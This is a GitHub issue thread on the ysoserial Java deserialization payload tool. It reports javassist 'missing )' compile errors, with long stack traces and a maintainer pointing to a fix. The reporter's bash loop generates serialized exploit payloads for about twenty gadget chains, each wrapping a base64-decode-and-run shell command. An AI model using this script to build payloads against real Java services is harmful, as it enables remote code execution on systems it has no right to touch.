### ISSUE TITLE
javassist.CannotCompileException: [source error] ) is missing

### ISSUE THREAD

**Issue by hktalent** [frohoff/ysoserial#102]
```
doExexx='bash -c "echo '$x1'|base64 -d|sh"'
myTypes=("CommonsCollections1" "CommonsCollections2" "CommonsCollections3" "CommonsCollections4" "CommonsCollections5" "CommonsCollections6" "BeanShell1" "Clojure" "Groovy1" "Hibernate1" "JSON1" "ROME" "Spring1" "Spring2" "Myfaces1" "Myfaces2" "Jdk7u21" "MozillaRhino1" "JavassistWeld1" "JBossInterceptors1" "Hibernate2")

for i in ${myTypes[@]}
do
    echo "do ${i} type payload"
    java -jar ./jars/ysoserial-0.0.6-SNAPSHOT-all.jar ${i} "'${doExexx}'" > ./tmp/payXX.ser 

# ....

done

```

```
do CommonsCollections2 type payload
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:119)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:101)
	at ysoserial.payloads.CommonsCollections2.getObject(CommonsCollections2.java:33)
	at ysoserial.payloads.CommonsCollections2.getObject(CommonsCollections2.java:27)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 6 more
do CommonsCollections3 type payload
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:119)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:101)
	at ysoserial.payloads.CommonsCollections3.getObject(CommonsCollections3.java:36)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 5 more
do CommonsCollections4 type payload
Error while generating or serializing payload
javassist.CannotCompileException: [source error] ) is missing
	at javassist.CtBehavior.insertAfter(CtBehavior.java:877)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:792)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:119)
	at ysoserial.payloads.util.Gadgets.createTemplatesImpl(Gadgets.java:101)
	at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:32)
	at ysoserial.payloads.CommonsCollections4.getObject(CommonsCollections4.java:26)
	at ysoserial.GeneratePayload.main(GeneratePayload.java:34)
Caused by: compile error: ) is missing
	at javassist.compiler.Parser.parseArgumentList(Parser.java:1340)
	at javassist.compiler.Parser.parseMethodCall(Parser.java:1180)
	at javassist.compiler.Parser.parsePostfix(Parser.java:1036)
	at javassist.compiler.Parser.parseUnaryExpr(Parser.java:888)
	at javassist.compiler.Parser.parseBinaryExpr(Parser.java:775)
	at javassist.compiler.Parser.parseConditionalExpr(Parser.java:719)
	at javassist.compiler.Parser.parseExpression(Parser.java:699)
	at javassist.compiler.Parser.parseDeclarationOrExpression(Parser.java:591)
	at javassist.compiler.Parser.parseStatement(Parser.java:277)
	at javassist.compiler.Javac.compileStmnt(Javac.java:567)
	at javassist.CtBehavior.insertAfterAdvice(CtBehavior.java:892)
	at javassist.CtBehavior.insertAfter(CtBehavior.java:851)
	... 6 more
do CommonsCollections5 type payload
```

**Comment by hktalent** [comment]
@frohoff #86

**Comment by frohoff** [comment]
Any of these errors should be resolved by #151
